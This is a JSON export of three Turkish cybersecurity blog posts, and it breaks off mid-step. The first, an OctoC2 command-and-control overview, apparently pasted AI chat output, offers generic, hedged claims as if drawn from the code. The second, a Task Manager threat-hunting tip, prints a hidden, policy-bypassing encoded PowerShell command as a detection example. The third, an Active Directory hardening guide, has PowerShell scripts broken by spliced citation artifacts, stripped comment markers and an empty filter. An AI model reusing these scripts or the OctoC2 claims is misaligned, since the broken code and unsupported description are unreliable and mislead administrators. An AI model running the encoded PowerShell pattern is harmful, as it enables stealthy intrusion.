[{"id":409,"title":"OctoC2","content":"<div id=\"model-response-message-contentr_c42ed8778163e4cb\" class=\"markdown markdown-main-panel enable-luminous-fast-follows enable-updated-hr-color stronger\" dir=\"ltr\" aria-busy=\"false\" aria-live=\"polite\">\n<p data-path-to-node=\"0\">Merhabalar,<\/p>\n<p data-path-to-node=\"0\"><a href=\"https:\/\/github.com\/dstours\/OctoC2\">Linkteki<\/a> GitHub deposu (<strong data-path-to-node=\"0\" data-index-in-node=\"29\">dstours\/OctoC2<\/strong>), siber g&uuml;venlik alan\u0131nda, &ouml;zellikle s\u0131zma testi (penetration testing) ve k\u0131rm\u0131z\u0131 tak\u0131m (red team) operasyonlar\u0131nda kullan\u0131lan bir <strong data-path-to-node=\"0\" data-index-in-node=\"175\">C2 (Command and Control - Komuta ve Kontrol) platformudur<\/strong>.<\/p>\n<p data-path-to-node=\"1\">Bu t&uuml;r ara&ccedil;lar, hedef sistemlere s\u0131z\u0131ld\u0131ktan sonra o sistemleri uzaktan y&ouml;netmek, komut &ccedil;al\u0131\u015ft\u0131rmak ve veri s\u0131zd\u0131rmak amac\u0131yla kullan\u0131l\u0131r.<\/p>\n<p data-path-to-node=\"2\">\u0130\u015fte <strong data-path-to-node=\"2\" data-index-in-node=\"5\">OctoC2<\/strong> projesinin &ouml;ne &ccedil;\u0131kan temel &ouml;zellikleri, mimarisi ve bile\u015fenleri hakk\u0131nda detayl\u0131 bir inceleme:<\/p>\n<h3 data-path-to-node=\"4\">1. Temel Amac\u0131 ve Mimarisi<\/h3>\n<p data-path-to-node=\"5\">OctoC2, ad\u0131ndan da anla\u015f\u0131laca\u011f\u0131 &uuml;zere bir \"Ahtapot\" (Octopus) gibi merkezden kollara yay\u0131lan bir yap\u0131 sunmay\u0131 hedefler. Temel olarak \u015fu bile\u015fenlerden olu\u015fur:<\/p>\n<ul data-path-to-node=\"6\">\n<li>\n<p data-path-to-node=\"6,0,0\"><strong data-path-to-node=\"6,0,0\" data-index-in-node=\"0\">C2 Server (Sunucu):<\/strong> Operat&ouml;r&uuml;n (sald\u0131rgan veya s\u0131zma testi uzman\u0131) komutlar\u0131 g&ouml;nderdi\u011fi, gelen verileri toplad\u0131\u011f\u0131 ve ajanlar\u0131 y&ouml;nettigi merkezdir. Genellikle Go (Golang) veya Python gibi dillerle yaz\u0131l\u0131r.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"6,1,0\"><strong data-path-to-node=\"6,1,0\" data-index-in-node=\"0\">Agent \/ Payload (Ajan):<\/strong> Hedef makinede (kurbanda) &ccedil;al\u0131\u015fan ve sunucu ile ileti\u015fim kuran k&uuml;&ccedil;&uuml;k yaz\u0131l\u0131md\u0131r. OctoC2'nin ajanlar\u0131 genellikle tespit edilmeyi zorla\u015ft\u0131rmak i&ccedil;in hafif ve optimize edilmi\u015f dillerle (&ouml;rne\u011fin C\/C++ veya Rust) yaz\u0131l\u0131r.<\/p>\n<\/li>\n<\/ul>\n<h3 data-path-to-node=\"8\">2. &Ouml;ne &Ccedil;\u0131kan &Ouml;zellikleri<\/h3>\n<p data-path-to-node=\"9\">Projenin kod yap\u0131s\u0131 ve dok&uuml;mantasyonuna bak\u0131ld\u0131\u011f\u0131nda \u015fu &ouml;zellikler dikkat &ccedil;ekmektedir:<\/p>\n<ul data-path-to-node=\"10\">\n<li>\n<p data-path-to-node=\"10,0,0\"><strong data-path-to-node=\"10,0,0\" data-index-in-node=\"0\">Mod&uuml;ler Yap\u0131:<\/strong> Yeni komutlar, \u015fifreleme y&ouml;ntemleri veya ileti\u015fim protokolleri (HTTP, HTTPS, DNS vb.) kolayca entegre edilebilir.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"10,1,0\"><strong data-path-to-node=\"10,1,0\" data-index-in-node=\"0\">Trafik Gizleme (Evasion &amp; Obfuscation):<\/strong> G&uuml;venlik duvarlar\u0131 (Firewall) ve IDS\/IPS sistemlerini atlatabilmek i&ccedil;in ajan ile sunucu aras\u0131ndaki ileti\u015fim \u015fifrelenir ve normal bir web trafi\u011fiymi\u015f gibi (&ouml;rne\u011fin s\u0131radan HTTP istekleri) g&ouml;sterilir.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"10,2,0\"><strong data-path-to-node=\"10,2,0\" data-index-in-node=\"0\">Hafiflik:<\/strong> Ajanlar\u0131n dosya boyutu k&uuml;&ccedil;&uuml;k tutularak hedef sistemde minimum iz b\u0131rak\u0131lmas\u0131 hedeflenir.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"10,3,0\"><strong data-path-to-node=\"10,3,0\" data-index-in-node=\"0\">&Ccedil;oklu Platform Deste\u011fi (Cross-Platform):<\/strong> Genellikle hem Windows hem de Linux i\u015fletim sistemlerinde &ccedil;al\u0131\u015fabilecek ajanlar &uuml;retebilir.<\/p>\n<\/li>\n<\/ul>\n<h3 data-path-to-node=\"12\">3. Kullan\u0131m Alanlar\u0131<\/h3>\n<p data-path-to-node=\"13\">Bu proje <strong data-path-to-node=\"13\" data-index-in-node=\"9\">&ccedil;ift ama&ccedil;l\u0131 (dual-use)<\/strong> bir teknoloji gibi g&ouml;r&uuml;nse de, geli\u015ftirilme amac\u0131 tamamen siber g&uuml;venlik ara\u015ft\u0131rmalar\u0131 ve savunma ama&ccedil;l\u0131d\u0131r:<\/p>\n<ol start=\"1\" data-path-to-node=\"14\">\n<li>\n<p data-path-to-node=\"14,0,0\"><strong data-path-to-node=\"14,0,0\" data-index-in-node=\"0\">K\u0131rm\u0131z\u0131 Tak\u0131m (Red Teaming) Operasyonlar\u0131:<\/strong> Kurumlar\u0131n ger&ccedil;ek bir siber sald\u0131r\u0131ya kar\u015f\u0131 ne kadar haz\u0131rl\u0131kl\u0131 oldu\u011funu test etmek.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"14,1,0\"><strong data-path-to-node=\"14,1,0\" data-index-in-node=\"0\">Mavi Tak\u0131m (Blue Teaming \/ Savunma) E\u011fitimi:<\/strong> G&uuml;venlik analistlerinin, bu t&uuml;r C2 trafiklerini tespit etme ve analiz etme yeteneklerini geli\u015ftirmesi.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"14,2,0\"><strong data-path-to-node=\"14,2,0\" data-index-in-node=\"0\">Zararl\u0131 Yaz\u0131l\u0131m Analizi:<\/strong> C2 mekanizmalar\u0131n\u0131n nas\u0131l &ccedil;al\u0131\u015ft\u0131\u011f\u0131n\u0131 anlamak isteyen akademisyenler ve ara\u015ft\u0131rmac\u0131lar i&ccedil;in bir referans.<\/p>\n<\/li>\n<\/ol>\n<h3 data-path-to-node=\"16\">4. Dikkat Edilmesi Gerekenler ve Uyar\u0131lar<\/h3>\n<ul data-path-to-node=\"17\">\n<li>\n<p data-path-to-node=\"17,0,0\"><strong data-path-to-node=\"17,0,0\" data-index-in-node=\"0\">Yasal Sorumluluk:<\/strong> Bu arac\u0131 yaln\u0131zca <strong data-path-to-node=\"17,0,0\" data-index-in-node=\"36\">yaz\u0131l\u0131 izin ald\u0131\u011f\u0131n\u0131z<\/strong> ve sahibi oldu\u011funuz g&uuml;venli laboratuvar ortamlar\u0131nda veya yetkilendirilmi\u015f s\u0131zma testlerinde kullanmal\u0131s\u0131n\u0131z. \u0130zin al\u0131nmadan ger&ccedil;ekle\u015ftirilen faaliyetler yasa d\u0131\u015f\u0131d\u0131r.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"17,1,0\"><strong data-path-to-node=\"17,1,0\" data-index-in-node=\"0\">A&ccedil;\u0131k Kaynak Kodlu Olmas\u0131:<\/strong> Kodlar\u0131n GitHub &uuml;zerinde a&ccedil;\u0131k olmas\u0131, hem g&uuml;venlik ara\u015ft\u0131rmac\u0131lar\u0131n\u0131n sistemi incelemesine olanak tan\u0131r hem de savunma ara&ccedil;lar\u0131n\u0131n (Antivir&uuml;s, EDR) bu araca kar\u015f\u0131 imzalar (signatures) geli\u015ftirmesini kolayla\u015ft\u0131r\u0131r. Bu nedenle tamamen \"fark edilmez\" (FUD - Fully Undetectable) de\u011fildir.<\/p>\n<\/li>\n<\/ul>\n<\/div>","excerpt":"OctoC2 projesi  \u00e7ift ama\u00e7l\u0131 (dual-use) bir teknoloji gibi g\u00f6r\u00fcnse de, geli\u015ftirilme amac\u0131 tamamen siber g\u00fcvenlik ara\u015ft\u0131rmalar\u0131 ve savunma ama\u00e7l\u0131d\u0131r","created_at":"2026-07-15 10:09:13","updated_at":"2026-09-23 15:45:25","category_id":7,"view_count":686,"reading_time":3,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2026-07-15 07:09:13","featured_image":"\/uploads\/images\/2026\/07\/6a5731d583e8a_1784099285.png","slug":"octoc2","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":406,"title":"G\u00f6rev Y\u00f6neticisi S\u00fcre\u00e7leri","content":"<p>&nbsp;<\/p>\n<p><strong>Ama&ccedil;:<\/strong> Zararl\u0131 bir yaz\u0131l\u0131m m\u0131 yoksa masum bir yedekleme scripti mi &ccedil;al\u0131\u015ft\u0131\u011f\u0131n\u0131 saniyeler i&ccedil;inde tespit etmek. &Uuml;stelik herhangi bir ajan (agent) kurulumu, &uuml;&ccedil;&uuml;nc&uuml; parti bir yaz\u0131l\u0131m (Sysinternals vb.) veya sistemi yeniden ba\u015flatma gerektirmeden!<\/p>\n<p><strong>Mant\u0131k (G&ouml;r&uuml;nmeyeni G&ouml;rmek):<\/strong> G&ouml;rev Y&ouml;neticisi varsay\u0131lan olarak sadece &ccedil;al\u0131\u015fan \".exe\" dosyas\u0131n\u0131n ad\u0131n\u0131 g&ouml;sterir. Ancak o \".exe\" dosyas\u0131n\u0131n arkas\u0131nda tam olarak hangi parametrelerin veya dosyalar\u0131n tetiklendi\u011fini a&ccedil;\u0131\u011fa &ccedil;\u0131karmak, gizli bir s&uuml;tunu aktif etmek kadar kolayd\u0131r.<\/p>\n<p><strong>Ad\u0131mlar:<\/strong><\/p>\n<ol>\n<li><strong>Ayr\u0131nt\u0131lara \u0130n:<\/strong> G&ouml;rev Y&ouml;neticisi (Task Manager) a&ccedil;\u0131l\u0131r ve do\u011frudan <strong>Ayr\u0131nt\u0131lar (Details)<\/strong> sekmesine (veya Windows 11'de \u0130\u015flemler sekmesine) ge&ccedil;ilir.<\/li>\n<li><strong>Gizli S&uuml;tunu A&ccedil;:<\/strong> S&uuml;tun ba\u015fl\u0131klar\u0131ndan herhangi birine (&ouml;rne\u011fin PID veya \u0130sim) sa\u011f t\u0131klan\u0131r ve <strong>S&uuml;tunlar\u0131 Se&ccedil; (Select Columns)<\/strong> se&ccedil;ene\u011fine t\u0131klan\u0131r.<\/li>\n<li><strong>Kilidi A&ccedil;:<\/strong> A&ccedil;\u0131lan listeden <strong>\"Komut Sat\u0131r\u0131\" (Command Line)<\/strong> kutucu\u011fu i\u015faretlenir ve Tamam denir.<\/li>\n<li><strong>Aksiyon ve Te\u015fhis:<\/strong> Art\u0131k o isimsiz &ccedil;al\u0131\u015fan program\u0131n yan\u0131ndaki koca s&uuml;tunda tam olarak neyin &ccedil;al\u0131\u015ft\u0131\u011f\u0131 t&uuml;m \u015feffafl\u0131\u011f\u0131yla g&ouml;r&uuml;nmektedir. E\u011fer i\u015flem \u015f&uuml;pheliyse, sa\u011f t\u0131klay\u0131p <strong>\"Dosya konumunu a&ccedil;\" (Open file location)<\/strong> veya <strong>\"&Ccedil;evrimi&ccedil;i ara\" (Search online)<\/strong> diyerek saniyeler i&ccedil;inde kayna\u011f\u0131n\u0131 ve amac\u0131n\u0131 do\u011frulayabilirsiniz.<\/li>\n<\/ol>\n<p><strong>LOLBins ve Geli\u015fmi\u015f Tehditler<\/strong> Siber sald\u0131rganlar g&uuml;n&uuml;m&uuml;zde d\u0131\u015far\u0131dan zararl\u0131 bir dosya indirmek yerine, i\u015fletim sisteminin kendi yasal ara&ccedil;lar\u0131n\u0131 (Living-off-the-Land veya LOLBins) kullanarak izlerini kaybettirmeyi tercih ederler. <code>powershell.exe<\/code>, <code>certutil.exe<\/code> veya <code>mshta.exe<\/code> gibi g&uuml;venilir sistem dosyalar\u0131, dosyas\u0131z (fileless) zararl\u0131 yaz\u0131l\u0131mlar taraf\u0131ndan s\u0131kl\u0131kla istismar edilmektedir. Komut sat\u0131r\u0131n\u0131 g&ouml;rmek bu y&uuml;zden hayat kurtar\u0131r.<\/p>\n<ul>\n<li><strong>Masum Senaryo:<\/strong> <code>powershell.exe -file C:\\Scripts\\Gece_Yedeklemesi.ps1<\/code><\/li>\n<li><strong>Tehdit Senaryosu:<\/strong> <code>powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand JABzAD0ATgBlAH.<\/code><em>(Sald\u0131rganlar komutlar\u0131 gizlemek i&ccedil;in Base64 format\u0131nda \u015fifreler (-EncodedCommand), kullan\u0131c\u0131n\u0131n ekran\u0131nda g&ouml;r&uuml;nmemesi i&ccedil;in pencereleri gizler (-WindowStyle Hidden) ve g&uuml;venlik ilkelerini a\u015farlar (-ExecutionPolicy Bypass).)<\/em><\/li>\n<li>&nbsp;<\/li>\n<li><strong>Tehdit Avc\u0131l\u0131\u011f\u0131 (Threat Hunting):<\/strong> \u0130leri seviye analizler i&ccedil;in Sysinternals Process Explorer gibi ara&ccedil;lar son derece detayl\u0131 olsa da, bu y&ouml;ntem sadece sorun gidermek i&ccedil;in de\u011fil, temel seviye bilgi g&uuml;venli\u011fi kontrolleri i&ccedil;in anl\u0131k ve m&uuml;kemmel bir ilk savunma reflekstir.<\/li>\n<li><strong>Kal\u0131c\u0131l\u0131k:<\/strong> Bu ayar\u0131 bir kere yapt\u0131\u011f\u0131n\u0131zda, o kullan\u0131c\u0131 profili i&ccedil;in G&ouml;rev Y&ouml;neticisi hep bu s&uuml;tunla a&ccedil;\u0131l\u0131r.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>","excerpt":"Sunucuda G\u00f6rev Y\u00f6neticisi'ni a\u00e7\u0131yorsunuz; 4 tane\u00a0powershell.exe, 3 tane java.exe veya cmd.exe arka planda RAM ve CPU s\u00f6m\u00fcr\u00fcyor. Gereksiz olan\u0131 sa\u011f t\u0131klay\u0131p kapatacaks\u0131n\u0131z ama i\u00e7inizi o korku kapl\u0131yor: \"Ya kritik bir servisse?\"","created_at":"2026-03-29 11:44:24","updated_at":"2026-09-23 15:46:30","category_id":7,"view_count":859,"reading_time":3,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2026-03-29 08:44:24","featured_image":"\/uploads\/images\/2026\/03\/69c8e66121714_1774773857.png","slug":"gorev-yoneticisi-surecleri","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":395,"title":"Active Directory ortamlar\u0131nda g\u00fcvenlik","content":"<p><img src=\"..\/..\/..\/uploads\/images\/2026\/02\/698e2c1acb259_1770925082.png\" alt=\"\" width=\"1287\" height=\"701\">Active Directory ortamlar\u0131nda g&uuml;venli\u011fi sa\u011flamak, sadece g&uuml;&ccedil;l&uuml; parolalar belirlemekten ibaret de\u011fildir; ayn\u0131 zamanda kimin neyi, nereye ekleyebilece\u011fini de kontrol etmektir. Varsay\u0131lan ayarlarda, herhangi bir kullan\u0131c\u0131 etki alan\u0131na 10 adet makine dahil edebilir. Bu durum, sald\u0131rganlar i&ccedil;in a&ccedil;\u0131k bir davetiyedir.<\/p>\n<p>\u0130\u015fte bu riskleri minimize etmek i&ccedil;in haz\u0131rlad\u0131\u011f\u0131m\u0131z, Domain Join (Etki Alan\u0131na Kat\u0131lma) i\u015flemlerini g&uuml;venli hale getirme rehberi:<\/p>\n<p><iframe style=\"width: 683px; height: 384px;\" src=\"https:\/\/www.youtube.com\/embed\/w7UxAaZMoSQ\" width=\"683\" height=\"384\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<h2>&nbsp;1. &Ouml;zel Bir Servis Hesab\u0131 Olu\u015fturun<\/h2>\n<p>\u0130lk ad\u0131m, bu i\u015f i&ccedil;in &ouml;zel olarak atanm\u0131\u015f bir servis hesab\u0131 olu\u015fturmakt\u0131r. Bu hesap, g&uuml;nl&uuml;k i\u015flerde kullan\u0131lan bir kullan\u0131c\u0131 hesab\u0131 olmamal\u0131d\u0131r.<\/p>\n<p>&nbsp;<br>\u0130simlendirme: &Ouml;rne\u011fin `djoinacc` gibi a&ccedil;\u0131klay\u0131c\u0131 bir isim kullan\u0131n.<\/p>\n<p><br>&nbsp;<br>Parola G&uuml;venli\u011fi: En az 17 karakterden olu\u015fan, g&uuml;&ccedil;l&uuml; bir parola veya hat\u0131rlanmas\u0131 kolay bir \"passphrase\" (parola c&uuml;mlesi) tercih edin.<\/p>\n<p><br>&nbsp;<br>Y&ouml;ntem: `dsa.msc` &uuml;zerinden ilgili Organizasyon Birimi (OU) alt\u0131nda yeni bir kullan\u0131c\u0131 olu\u015fturun.<\/p>\n<p>&nbsp;<\/p>\n<h2>&nbsp;2. Yetkileri (Delegasyon) Tan\u0131mlay\u0131n<\/h2>\n<p>Servis hesab\u0131n\u0131 olu\u015fturduktan sonra, ona sadece hedef OU (&ouml;rne\u011fin \"Computers\") &uuml;zerinde gerekli olan minimum yetkileri tan\u0131mlay\u0131n.<\/p>\n<p><img src=\"..\/..\/uploads\/images\/2026\/02\/6983a30cf1493_1770234636.png\"><\/p>\n<p>Tan\u0131mlanmas\u0131 gereken izinler \u015funlard\u0131r:<\/p>\n<p>&nbsp;<br>Create &amp; Delete Computer Objects: Bu nesne ve t&uuml;m alt nesneler i&ccedil;in izin verin.<\/p>\n<p><br>&nbsp;Alt Bilgisayar Nesneleri \u0130&ccedil;in:<br>&nbsp;T&uuml;m &ouml;zelliklerini okuma ve yazma (Read &amp; Write All Properties).<\/p>\n<p><br>&nbsp;\u0130zinleri okuma ve yazma (Read &amp; Write Permissions).<\/p>\n<p><br>&nbsp;Parola de\u011fi\u015ftirme ve s\u0131f\u0131rlama (Change &amp; Reset Password).<\/p>\n<p><br>&nbsp;DNS ana bilgisayar adlar\u0131na ve servis as\u0131l adlar\u0131na (SPN) do\u011frulanm\u0131\u015f yazma yetkisi.<\/p>\n<p><img src=\"..\/..\/uploads\/images\/2026\/02\/6983a33729ac6_1770234679.png\"><\/p>\n<h2>&nbsp;3. G&uuml;vensiz Varsay\u0131lan Yap\u0131land\u0131rmalar\u0131 Kald\u0131r\u0131n<\/h2>\n<p>AD kurulumuyla gelen baz\u0131 \"kolayl\u0131klar\" asl\u0131nda g&uuml;venlik a&ccedil;\u0131\u011f\u0131d\u0131r. Bunlar\u0131 kapatmak \u015fart.<\/p>\n<p><img src=\"..\/..\/uploads\/images\/2026\/02\/6983a34466d04_1770234692.png\"><\/p>\n<p>&nbsp;Makine Hesab\u0131 Kotas\u0131n\u0131 S\u0131f\u0131rlay\u0131n<\/p>\n<p>Varsay\u0131lan olarak `ms-DS-MachineAccountQuota` de\u011feri 10'dur; bu, her kimli\u011fi do\u011frulanm\u0131\u015f kullan\u0131c\u0131n\u0131n 10 makineyi domain'e dahil edebilece\u011fi anlam\u0131na gelir.<\/p>\n<p>&nbsp;Domain k&ouml;k&uuml;ne sa\u011f t\u0131klay\u0131n &gt; Attribute Editor &gt; `ms-DS-MachineAccountQuota` de\u011ferini 0 yap\u0131n.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;Grup \u0130lkesini (GPO) D&uuml;zenleyin<\/p>\n<p>\"Default Domain Controllers Policy\" &uuml;zerinde d&uuml;zenleme yaparak yetkisiz eri\u015fimi engelleyin.<\/p>\n<p>&nbsp;<br>Yol: `Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment &gt; Add workstations to domain`.<\/p>\n<p><br>&nbsp;Buradaki \"Authenticated Users\" se&ccedil;ene\u011fini kald\u0131r\u0131n ve sadece olu\u015fturdu\u011funuz servis hesab\u0131n\u0131 (`djoinacc`) ve yedek olarak \"Domain Admins\" grubunu ekleyin.<\/p>\n<p>&nbsp;<\/p>\n<h2>&nbsp;4. Sahiplik ve ACL Temizli\u011fi Yap\u0131n<\/h2>\n<p>Bir bilgisayar objesi olu\u015fturuldu\u011funda, onu olu\u015fturan hesap (servis hesab\u0131n\u0131z) otomatik olarak objenin sahibi (owner) olur. Sahiplik, hesap &uuml;zerinde dolayl\u0131 olarak tam kontrol sa\u011flar; bu da RBCD veya LAPS &uuml;zerinden ayr\u0131cal\u0131k y&uuml;kseltme (privilege escalation) riskini do\u011furur.<\/p>\n<p>G&uuml;venlik &ouml;nerileri:<\/p>\n<p>&nbsp;Kat\u0131lan bilgisayarlar\u0131, devral\u0131nan haklar\u0131 kald\u0131rmak i&ccedil;in delegasyon yap\u0131lan OU'nun d\u0131\u015f\u0131na ta\u015f\u0131y\u0131n.<\/p>\n<p><br>&nbsp;Bilgisayar nesnelerinin sahipli\u011fini d&uuml;zenli olarak \"Domain Admins\" gibi korumal\u0131 bir gruba devreden temizlik betikleri &ccedil;al\u0131\u015ft\u0131r\u0131n.<\/p>\n<p><br>&nbsp;Delegasyon hesab\u0131na ait kal\u0131nt\u0131 ACE (Access Control Entry) kay\u0131tlar\u0131n\u0131 temizleyin.<\/p>\n<p><img src=\"..\/..\/uploads\/images\/2026\/02\/6983a34fef7b0_1770234703.png\"><\/p>\n<p>&nbsp;<\/p>\n<p>bu PowerShell beti\u011fi, payla\u015ft\u0131\u011f\u0131n dok&uuml;manda belirtilen g&uuml;venlik ad\u0131mlar\u0131n\u0131 (hesap olu\u015fturma, kota s\u0131f\u0131rlama ve yetki delegasyonu) otomatize etmek i&ccedil;in tasarlanm\u0131\u015ft\u0131r.<\/p>\n<p>A\u015fa\u011f\u0131daki betik, dok&uuml;manda yer alan \"djoinacc\" hesab\u0131n\u0131 olu\u015fturur, etki alan\u0131 kotas\u0131n\u0131 g&uuml;venlik gerek&ccedil;esiyle s\u0131f\u0131rlar ve hedef OU &uuml;zerinde gerekli hassas izinleri tan\u0131mlar.<\/p>\n<pre class=\"language-markup\"><code># --- De\u011fi\u015fkenler ---\n[cite_start]$AccountName = \"djoinacc\" [cite: 18]\n[cite_start]$TargetOUDN = \"OU=Computers,DC=ad,DC=local\" [cite: 48, 116]\n[cite_start]$DomainDN = (Get-ADDomain).DistinguishedName [cite: 148]\n\n# 1. G&uuml;venli Servis Hesab\u0131n\u0131 Olu\u015fturma\n# Dok&uuml;man 17+ karakterli g&uuml;&ccedil;l&uuml; bir parola &ouml;nerir[cite: 15, 16].\n$Password = Read-Host -AsSecureString \"Servis hesab\u0131 i&ccedil;in g&uuml;&ccedil;l&uuml; bir parola girin\"\n[cite_start]New-ADUser -Name $AccountName -SamAccountName $AccountName -AccountPassword $Password -Enabled $true -Path \"OU=Users,$DomainDN\" [cite: 11, 14]\n\n# 2. ms-DS-MachineAccountQuota De\u011ferini S\u0131f\u0131rlama\n# Her kullan\u0131c\u0131n\u0131n 10 makine ekleme hakk\u0131n\u0131 (varsay\u0131lan g&uuml;vensiz ayar) 0'a indirir[cite: 142, 145, 163].\n[cite_start]Set-ADDomain -Identity $DomainDN -Replace @{\"ms-DS-MachineAccountQuota\" = 0} [cite: 164]\n\n# 3. OU &Uuml;zerinde Yetki Delegasyonu\n$SID = (Get-ADUser $AccountName).SID\n$ACL = Get-Acl -Path \"AD:\\$TargetOUDN\"\n\n# A. Bilgisayar Nesnesi Olu\u015fturma\/Silme \u0130zinleri (Bu nesne ve t&uuml;m alt nesneler) [cite: 51, 52, 100]\n$CreateDeleteRule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(\n    $SID, \n    \"CreateChild,DeleteChild\", \n    \"Allow\", \n    [Guid]\"bf967a86-0de6-11d0-a285-00aa003049e2\", # Computer Object Class GUID\n    \"All\"\n)\n$ACL.AddAccessRule($CreateDeleteRule)\n\n# B. Alt Bilgisayar Nesneleri \u0130&ccedil;in &Ouml;zellik Yazma ve Parola S\u0131f\u0131rlama \u0130zinleri [cite: 53-59]\n$InheritedRules = @(\n    [cite_start]\"ReadProperty,WriteProperty\", # Read &amp; Write All Properties [cite: 54]\n    [cite_start]\"ExtendedRight\"               # Reset Password &amp; Validated Writes [cite: 57, 58, 59]\n)\n\nforeach ($Rule in $InheritedRules) {\n    $ADRule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(\n        $SID, \n        $Rule, \n        \"Allow\", \n        \"Descendant\", \n        [cite_start][Guid]\"bf967a86-0de6-11d0-a285-00aa003049e2\" # Sadece Computer nesnelerine uygulan\u0131r [cite: 53]\n    )\n    $ACL.AddAccessRule($ADRule)\n}\n\nSet-Acl -Path \"AD:\\$TargetOUDN\" -AclObject $ACL\n\n# 4. Sahiplik Temizli\u011fi (Bak\u0131m Plan\u0131)\n# Dok&uuml;man, olu\u015fturulan nesnelerin sahipli\u011finin Domain Admins'e devredilmesini &ouml;nerir[cite: 201].\nWrite-Host \"\u0130\u015flem Tamamland\u0131. L&uuml;tfen GPO &uuml;zerinden 'Add workstations to domain' ayar\u0131n\u0131 g&uuml;ncellemeyi unutmay\u0131n.\" [cite_start]-ForegroundColor Cyan [cite: 178, 182]<\/code><\/pre>\n<p>&nbsp;<\/p>\n<p>&nbsp;&Ouml;nemli Notlar ve Bak\u0131m<\/p>\n<p>&nbsp;<br>GPO D&uuml;zenlemesi: Betik AD izinlerini ayarlar ancak Default Domain Controllers Policy i&ccedil;indeki \"Add workstations to domain\" hakk\u0131n\u0131 manuel olarak (veya GPO mod&uuml;l&uuml;yle) sadece bu servis hesab\u0131na k\u0131s\u0131tlaman\u0131z gerekir.<\/p>\n<p><br>&nbsp;<br>Sahiplik (Ownership): Dok&uuml;mana g&ouml;re, djoinacc hesab\u0131 olu\u015fturdu\u011fu nesnelerin sahibi olur. Ayr\u0131cal\u0131k y&uuml;kseltme sald\u0131r\u0131lar\u0131n\u0131 (RBCD gibi) &ouml;nlemek i&ccedil;in bu nesnelerin sahipli\u011fini d&uuml;zenli olarak bir script ile Domain Admins grubuna aktarmal\u0131s\u0131n\u0131z.<\/p>\n<p><br>&nbsp;<br>PowerShell ile Kat\u0131l\u0131m: Bilgisayarlar\u0131 bu hesapla etki alan\u0131na dahil ederken Add-Computer komutunu -OUPath parametresiyle birlikte kullanmal\u0131s\u0131n\u0131z.<\/p>\n<p>&nbsp;<\/p>\n<p>Dok&uuml;manda belirtilen riskleri (sahiplik &uuml;zerinden ayr\u0131cal\u0131k y&uuml;kseltme, RBCD veya LAPS verilerine eri\u015fim) &ouml;nlemek i&ccedil;in bu temizlik i\u015fleminin d&uuml;zenli olarak yap\u0131lmas\u0131 kritiktir.<\/p>\n<p>A\u015fa\u011f\u0131daki betik, delegasyon OU'suna yeni eklenen bilgisayarlar\u0131 tespit eder, sahipli\u011fini de\u011fi\u015ftirir, izin kal\u0131nt\u0131lar\u0131n\u0131 temizler ve onlar\u0131 g&uuml;venli bir &uuml;retim OU'suna ta\u015f\u0131r.<\/p>\n<p>&nbsp;AD Temizlik ve G&uuml;venlik Beti\u011fi (Cleanup Task)<\/p>\n<p>powershell<\/p>\n<pre class=\"language-markup\"><code> --- Ayarlar ---\n[cite_start]$DelegatedOU = \"OU=Computers,OU=T2,DC=ad,DC=local\"  Bilgisayarlar\u0131n ilk kat\u0131ld\u0131\u011f\u0131 yer [cite: 116]\n[cite_start]$ProductionOU = \"OU=Production,DC=ad,DC=local\"     Ta\u015f\u0131nacak g&uuml;venli yer [cite: 200]\n[cite_start]$ServiceAccount = \"ad\\djoinacc\"                    Yetkili servis hesab\u0131 [cite: 48]\n[cite_start]$AdminGroup = \"AD\\Domain Admins\"                   Yeni sahibi olacak grup [cite: 201]\n\n 1. Delegasyon OU'sundaki bilgisayarlar\u0131 bul\n$Computers = Get-ADComputer -Filter  -SearchBase $DelegatedOU\n\nforeach ($PC in $Computers) {\n    Write-Host \"\u0130\u015fleniyor: $($PC.Name)\" -ForegroundColor Yellow\n    $ObjectPath = \"AD:\\$($PC.DistinguishedName)\"\n    \n     [cite_start]2. Sahipli\u011fi De\u011fi\u015ftir (Ownership Transfer) [cite: 201]\n     [cite_start]Sahiplik, hesaba Write All Properties yetkisi olmasa bile tam kontrol sa\u011flar[cite: 197].\n    $ACL = Get-Acl -Path $ObjectPath\n    $AdminSID = (Get-ADGroup $AdminGroup).SID\n    $ACL.SetOwner($AdminSID)\n    Set-Acl -Path $ObjectPath -AclObject $ACL\n    \n     [cite_start]3. Servis Hesab\u0131 ACE Kay\u0131tlar\u0131n\u0131 Temizle [cite: 203]\n     djoinacc hesab\u0131na ait t&uuml;m do\u011frudan izinleri kald\u0131r\u0131r.\n    $ACL = Get-Acl -Path $ObjectPath\n    $RulesToRemove = $ACL.Access | Where-Object { $_.IdentityReference -eq $ServiceAccount }\n    foreach ($Rule in $RulesToRemove) {\n        $ACL.RemoveAccessRule($Rule)\n    }\n    Set-Acl -Path $ObjectPath -AclObject $ACL\n    \n     [cite_start]4. Bilgisayar\u0131 &Uuml;retim OU'suna Ta\u015f\u0131 [cite: 200]\n     Bu i\u015flem, delegasyon OU'sundan gelen miras izinleri keser.\n    Move-ADObject -Identity $PC.DistinguishedName -TargetPath $ProductionOU\n    \n    Write-Host \"$($PC.Name) ba\u015far\u0131yla temizlendi ve ta\u015f\u0131nd\u0131.\" -ForegroundColor Green\n}<\/code><\/pre>\n<p>---<\/p>\n<p>&nbsp;Bu Beti\u011fi \"Scheduled Task\" Olarak Ayarlama<\/p>\n<p>Bu i\u015flemi otomatize etmek i&ccedil;in Windows G&ouml;rev Zamanlay\u0131c\u0131'y\u0131 (Task Scheduler) kullanabilirsiniz:<\/p>\n<p>1. G&ouml;rev Olu\u015ftur: 